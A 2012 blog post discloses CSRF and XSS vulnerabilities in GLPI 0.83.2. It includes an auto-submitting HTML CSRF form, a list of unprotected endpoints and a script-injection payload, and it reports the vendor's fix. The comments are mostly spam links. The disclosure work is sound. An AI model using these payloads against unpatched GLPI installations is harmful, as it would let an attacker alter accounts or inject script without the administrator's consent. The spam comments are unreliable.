Tuesday, October 16, 2012

Multiple CSRF and XSS vulnerabilities in GLPI - CVE-2012-4002/CVE-2012-4003

Few months back when i was researching on few resource management softwares i came across this amazing Resource manager (GLPI). After deploying it on my xampp server i started my initial phase of finding bugs.
The installed version of GLPI was 0.83.2 which i found was having multiple CSRF issues, some of the important functions which includes adding new users or raising a ticket lacked a proper CSRF mitigation.




I found that most of the user related tasks were vulnerable to CSRF attack. Here is a small POC on adding a new user. The page at http://<localhost>/glpi/front/preference.php allows us to add a user.



And after clicking on update the following POST request is sent to the server.


POST http://localhost/glpi/front/preference.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Cookie: PHPSESSID=bstsomr0qf11n0446gqai8gp03
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

name=glpi&id=2&realname=Attacker&language=en_GB&use_mode=0&update=Update

Since there is no CSRF token in the post request an attacker can easily create a html page and send to a logged-in administrator and can create him as an authenticated user without the administrator knowing about it.





Html POST-CSRF eg:

<html>
<body onload=csrf.submit()>
<form id="csrf" name="csrf" action="http://localhost/glpi/front/preference.php" method="POST">
<input type=hidden name="name" id="name" value="glpi"/>
<input type=hidden name="id" id="id" value="2"/>
<input type=hidden name="realname" id="realname" value="Attacker"/>
<input type=hidden name="language" id="language" value="en_GB"/>
<input type=hidden name="use_mode" id="use_mode" value="0"/>
<input type=hidden name="update" id="update" value="Update"/>
</form>
</body>
</html>




 Here are few more locations which didn't had CSRF protection:

http://localhost/glpi/front/user.form.php?id=3
http://localhost/glpi/front/user.form.php?id=2
http://localhost/glpi/front/user.form.php?id=5
http://localhost/glpi/front/user.form.php?id=4
http://localhost/glpi/front/user.form.php?new=1
http://localhost/glpi/front/profile.form.php?id=3
http://localhost/glpi/front/ruleimportcomputer.form.php
http://localhost/glpi/front/popup.php?popup=edit_bookmark
http://localhost/glpi/front/group.form.php
http://localhost/glpi/front/entity.form.php
http://localhost/glpi/front/popup.php
http://localhost/glpi/front/auth.settings.php
http://localhost/glpi/front/crontask.php?execute=*
http://localhost/glpi/front/fieldunicity.form.php
http://localhost/glpi/front/config.form.php
http://localhost/glpi/front/notificationmailsetting.form.php
http://localhost/glpi/front/*?reset=reset
http://localhost/glpi/front/backup.php?


Apart from CSRF the application also had an XSS flaw at http://localhost/glpi/front/config.form.php where there was an option we could provide text on login. This parameter was not sanitized from the back end and it would easily accept any malicious characters. A simple "><script>alert(1)</script> would prompt 1 on the login screen.






The GLPI security team was very prompt and cooperative in handling all my reported issues. And a few weeks back they came up with a new secure version of GLPI 0.83.3 with XSS and CSRF protection.

Thanks GLPI team for acknowledging me on their new software release (click).





13 comments :

  1. Awesome Prajal......very interesting page

    Abhishek here

    ReplyDelete
  2. 172.22.22.12 if I'm not wrong ;) But why hide the local IP ?

    ReplyDelete
  3. What a great online source of information about this topic. you have done great work. keep continue to sharing such kinds of post. keep it up.
    Signature:
    download baixar facebook movel, Facebook movel, baixar facebook movel. Facebook chat, baixar whatsapp gratis, fazer o download baixar whatsapp para Android, iPhone. Últimas Facebook

    ReplyDelete
  4. Packers and movers Noida @ http://www.noidapackers.co.in/
    packers and movers noida sector 12 @ http://www.noidapackers.co.in/
    packers and movers noida sector 53 @ http://www.noidapackers.co.in/
    packers and movers noida sector 51 @ http://www.noidapackers.co.in/
    packers and movers noida sector 50 @ http://www.noidapackers.co.in/
    packers and movers noida sector 49 @ http://www.noidapackers.co.in/
    packers and movers noida sector 41 @ http://www.noidapackers.co.in/
    packers and movers noida sector 39 @ http://www.noidapackers.co.in/
    packers and movers noida sector 62 @ http://www.noidapackers.co.in/
    packers and movers noida sector 61 @ http://www.noidapackers.co.in/

    ReplyDelete
  5. I was working and suddenly I visits your site frequently and recommended it to me to read also. The writing style is superior and the content is relevant. Thanks for the insight you provide the readers!
    Signature:
    The place to play all unblocked games online. Here you can find every blocked games such as: unblockedgames , unblocked games happy , unblocked games 77 , gmod

    ReplyDelete
  6. I would like to thank you for your nicely written post
    Signature:
    Versión en facebook en español descargar a los países hablan Español: facebook entrar direto agora , facebook en español descargar , facebook entrar direto agora

    ReplyDelete

  7. Delhi packers and movers @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Packers and movers in Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Movers and packers in Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Packers and movers Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/

    ReplyDelete

  8. Delhi packers and movers @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Packers and movers in Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Movers and packers in Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/
    Packers and movers Delhi @ http://b2bad.in/Packers-and-Movers-in-Delhi/

    ReplyDelete
  9. But ngta still trying to laugh together fresh to backstabbing several simple
    whatsapp gratis , unblockedgames very nice , free unblockedgames online to play , descargar whatsapp , unblocked games 77 , unblocked games online

    ReplyDelete